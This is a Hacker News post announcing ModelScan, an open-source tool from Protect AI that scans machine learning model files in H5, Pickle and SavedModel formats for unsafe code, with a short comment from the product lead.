Hacker News new | past | comments | ask | show | jobs | submit login
ModelScan – open-source scanning for unsafe code in ML models (github.com/protectai)
4 points by wolftickets 10 months ago | hide | past | favorite | 1 comment



I lead product at Protect AI and we just released ModelScan. It is open source project that scans models to determine if they contain unsafe code. It is the first model scanning tool to support multiple model formats. ModelScan currently supports: H5, Pickle, and SavedModel formats. This protects you when using PyTorch, TensorFlow, Keras, Sklearn, XGBoost, with more on the way.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: